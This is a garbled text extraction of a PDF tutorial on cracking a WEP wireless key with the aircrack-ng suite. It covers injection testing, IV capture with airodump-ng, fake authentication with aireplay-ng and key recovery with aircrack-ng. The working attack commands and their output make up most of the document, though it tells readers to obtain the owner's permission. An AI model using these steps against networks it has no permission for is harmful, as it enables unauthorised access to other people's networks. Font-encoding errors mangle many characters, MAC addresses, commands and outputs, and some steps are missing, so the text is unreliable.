hacking wep with aircrack
TRANSCRIPT
-
8/10/2019 Hacking WEP With Aircrack
1/9
Hacking WEP with Aircrack
This tutorial walks you though a very simple case to crack a WEP key. It is intended to build
your basic skills and get you familiar with the concepts. It assumes you have a working
wireless card with drivers already patched for injection.
It is recommended that you experiment with your home wireless access point to get familiar
with these ideas and techniues. If you do not own a particular access point! please remember
to get permission from the owner prior to playing with it.
I would like to acknowledge and thank the "ircrack#ng teamfor producing such a great robust
tool.
Please send me any constructive feedback! positive or negative. "dditional troubleshooting
ideas and tips are especially welcome.
Assumptions
$irst! this solution assumes%
&ou are using drivers patched for injection.
&ou are physically close enough to send and receive access point packets. 'emember
that just because you can receive packets from the access point does not mean you
may will be able to transmit packets to the "P. The wireless card strength is typically
less then the "P strength. (o you have to be physically close enough for your
transmitted packets to reach and be received by the "P.
There is at least one wired or wireless client connected to the network and they areactive. The reason is that this tutorial depends on receiving at least one "'P reuest
packet and if there are no active clients then there will never be any "'P reuest
packets.
&ou are using v).* of aircrack#ng. If you use a different version then some of the
common options may have to be changed.
Ensure all of the above assumptions are true! otherwise the advice that follows will not work.
In the examples below! you will need to change +ath), to the interface name which is specific
to your wireless card.
Equipment used
In this tutorial! here is what was used%
-" address of P running aircrack#ng suite% ))%)$%/0%11%"%12
/((I3 4-" address of access point5% ))%67%8%9E%7)%1)
E((I3 4Wireless network name5% teddy
"ccess point channel% *
Wireless interface% ath)
http://trac.aircrack-ng.org/wiki/Teamhttp://trac.aircrack-ng.org/wiki/Team -
8/10/2019 Hacking WEP With Aircrack
2/9
&ou should gather the euivalent information for the network you will be working on. Then
just change the values in the examples below to the specific network.
Solution
Solution Overview
To crack the WEP key for an access point! we need to gather lots of initiali:ation vectors
4I;s5.
-
8/10/2019 Hacking WEP With Aircrack
3/9
wifi0 no wireless etensions!
If there are any remaining athA interfaces! then stop each one. When you are finished! run
+iwconfig, to ensure there are none left.
: freuency
which is channel * and the "ccess Point shows the -" address of your wireless card. Please
note that only the madwifi#ng drivers show the -" address of your wireless card! the other
drivers do not do this. (o everything is good. It is important to confirm all this information
prior to proceeding! otherwise the following steps will not work properly.
To match the freuency to the channel! check out%
http%CCwww.rflinx.comChelpCcalculationsCD2.7gh:wifichannelsthen select the +Wifi hannel(election and hannel =verlap, tab. This will give you the freuency for each channel.
Step 2 Test Wireless Device Pacet !n"ection
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channelshttp://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels -
8/10/2019 Hacking WEP With Aircrack
4/9
The purpose of this step ensures that your card is within distance of your "P and can inject
packets to it.
Enter%
aireplay-ng -" -e teddy -a 00:':=C:>$:0:%0 ath0
Where%
#* means injection test
#e teddy is the wireless network name
#a ))%67%8%9E%7)%1) is the access point -" address
ath) is the wireless interface name
The system should respond with%
0":&:1 ?aiting for #eacon frame (5ID: 00:':=C:>$:0:%0) on channel "0":&:1 8rying #roadcast pro#e re./ests!!!0":&:1 In@ection is wor+ing0":&:> o/nd ' AP
0":&:> 8rying directed pro#e re./ests!!!0":&:> 00:':=C:>$:0:%0 - channel: " - BteddyB0":&:" Ping (min7avg7ma): '!%&>ms7=%!'1ms7'''!='0ms Power: !>0":&:" 070: '00
The last line is important. Ideally it should say 6))F or a very high percentage. If it is low
then you are too far away from the "P or too close. If it is :ero then injection is not working
and you need to patch your drivers or use different drivers.
Step # Start airodump$n% to capture the !&s
The purpose of this step is to capture the I;s generated. This step starts airodump#ng to
capture the I;s from the specific access point.
=pen another console session to capture the generated I;s. Then enter%
airod/mp-ng -c " --#ssid 00:':=C:>$:0:%0 -w o/tp/t ath0
Where%
#c * is the channel for the wireless network
##bssid ))%67%8%9E%7)%1) is the access point -" address. This eliminate extraneous
traffic.
#w capture is file name prefix for the file which will contain the I;s.
ath) is the interface name.
While the injection is taking place 4later5! the screen will look similar to this%
C3 " E $lapsed: % mins E &00>-0-&' '":&1
-
8/10/2019 Hacking WEP With Aircrack
5/9
5ID P?6 6F< 5eacons GDataH G7s C3 ,5 $*C CIP3$6A83 $ID
00:':=C:>$:0:%0 & '00 1&0 '>%0> % " 1 ?$P ?$Pteddy
5ID 8A8IJ* P?6 ;ost Pac+ets Pro#es
00:':=C:>$:0:%0 00:0:51:%%:AC:%& & 0 '%>%&
Step ' $ (se airepla)$n% to do a fae authentication with the access point
In order for an access point to accept a packet! the source -" address must already be
associated. If the source -" address you are injecting is not associated then the "P ignores
the packet and sends out a +3e"uthentication, packet in cleartext. In this state! no new I;s
are created because the "P is ignoring all the injected packets.
The lack of association with the access point is the single biggest reason why injection fails.
'emember the golden rule% The -" you use for injection must be associated with the "P by
either using fake authentication or using a -" from an already#associated client.
To associate with an access point! use fake authentication%
aireplay-ng -' 0 -e teddy -a 00:':=C:>$:0:%0 -h 00:0:51:%%:AC:%& ath0
Where%
#6 means fake authentication
) reassociation timing in seconds
#e teddy is the wireless network name
#a ))%67%8%9E%7)%1) is the access point -" address
#h ))%)$%/0%11%"%12 is our card -" address
ath) is the wireless interface name
(uccess looks like%
'%:'%:&0 ending A/thentication 6e./est'%:'%:&0 A/thentication s/ccessf/l'%:'%:&0 ending Association 6e./est'%:'%:&0 Association s/ccessf/l :-)
=r another variation for picky access points%
aireplay-ng -' =000 -o ' -. '0 -e teddy -a 00:':=C:>$:0:%0 -h00:0:51:%%:AC:%& ath0
Where%
8))) # 'eauthenticate every 8))) seconds. The long period also causes keep alive
packets to be sent.
-
8/10/2019 Hacking WEP With Aircrack
6/9
#o 6 # (end only one set of packets at a time. 3efault is multiple and this confuses
some "Ps.
# 6) # (end keep alive packets every 6) seconds.
(uccess looks like%
'%:&&:& ending A/thentication 6e./est
'%:&&:& A/thentication s/ccessf/l'%:&&:& ending Association 6e./est'%:&&:& Association s/ccessf/l :-)'%:&&:& ending +eep-alive pac+et'%:&&:1& ending +eep-alive pac+etG and so on!
>ere is an example of what a failed authentication looks like%
%:&%:0& ending A/thentication 6e./est'%:&%:0& A/thentication s/ccessf/l'%:&%:0& ending Association 6e./est'%:&%:0& Association s/ccessf/l :-)'%:&%:0& 2ot a dea/thentication pac+et'%:&%:01 ending A/thentication 6e./est'%:&%:01 A/thentication s/ccessf/l'%:&%:01 ending Association 6e./est'%:&%:'0 ending A/thentication 6e./est'%:&%:'0 A/thentication s/ccessf/l'%:&%:'0 ending Association 6e./est
-
8/10/2019 Hacking WEP With Aircrack
7/9
owever! decentdepends on a large variety of factors. " typical range is ?)) to 7)) data packets per second. It
can as low as a 6))Csecond and as high as a 0))Csecond.
Trou*leshootin% Tips
If you receive a message similar to +Bot a deauthCdisassoc packet. Is the source mac
associatedL,! this means you have lost association with the "P. "ll your injected
packets will be ignored. &ou must return to the fake authentication step 4(tep ?5 and
successfully associate with the "P.
Step - $ ,un aircrac$n% to o*tain the WEP e)
The purpose of this step is to obtain the WEP key from the I;s gathered in the previous steps.
-
8/10/2019 Hacking WEP With Aircrack
8/9
(tart another console session and enter%
aircrac+-ng -4 -# 00:':=C:>$:0:%0 o/tp/tM!cap
Where%
#: invokes the PTW WEP#cracking method.
#b ))%67%8%9E%7)%1) selects the one access point we are interested in. This is optionalsince when we originally captured the data! we applied a filter to only capture data for
this one "P.
outputN.cap selects all files starting with +output, and ending in ,.cap,.
To also use the $-(CMoreM method! start another console session and enter%
aircrac+-ng -# 00:':=C:>$:0:%0 o/tp/tM!cap
Where%
#b ))%67%8%9E%7)%1) selects the one access point we are interested in. This is optional
since when we originally captured the data! we applied a filter to only capture data for
this one "P.
outputN.cap selects all files starting with +output, and ending in ,.cap,.
If you are using 6.)#rc6! add the option ,#M, for the $-(CMoreM attack. 46.)#rc6 defaults to
PTW.5
&ou can run this while generating packets. In a short time! the WEP key will be calculated andpresented. &ou will need approximately 20)!))) I;s for 87 bit and 6!0))!))) I;s for 621 bit
keys. If you are using the PTW attack! then you will need about 2)!))) packets for 87#bit and
7)!))) to 10!))) packets for 621 bit. These are very approximate and there are many
variables as to how many I;s you actually need to crack the WEP key.
>ere is what success looks like%
Aircrac+-ng 0!"
E00:0:0= 8ested =>" +eys (got "=='0 IVs)
N5 depth #yte(vote) 0 07 " '&( '1) "( '1) >( '&) >( '&) $( '&) '5( 1)>>( 1) A1( ) =( ) 0( 0) ' 07 % ( =') $%( &>) $0( &) 0=( '%) 5( '=) $( '1)$'( '1) &D( ') %"( '&) $( '&) & 07 & 1=( %>) A=( =) '1( '>) 0&( '1) =5( '1) $0( '1)A5( ') 0$( '0) '>( '0) &>( '0) '7 1 >%( ) 'A( &0) "5( &0) 5( '>) A( '=) &5( '1)D( '1) 1%( '1) =A( '1) >C( '1)
N$L J*D E '&::1=:>%:"0 Pro#a#ility: '00
-
8/10/2019 Hacking WEP With Aircrack
9/9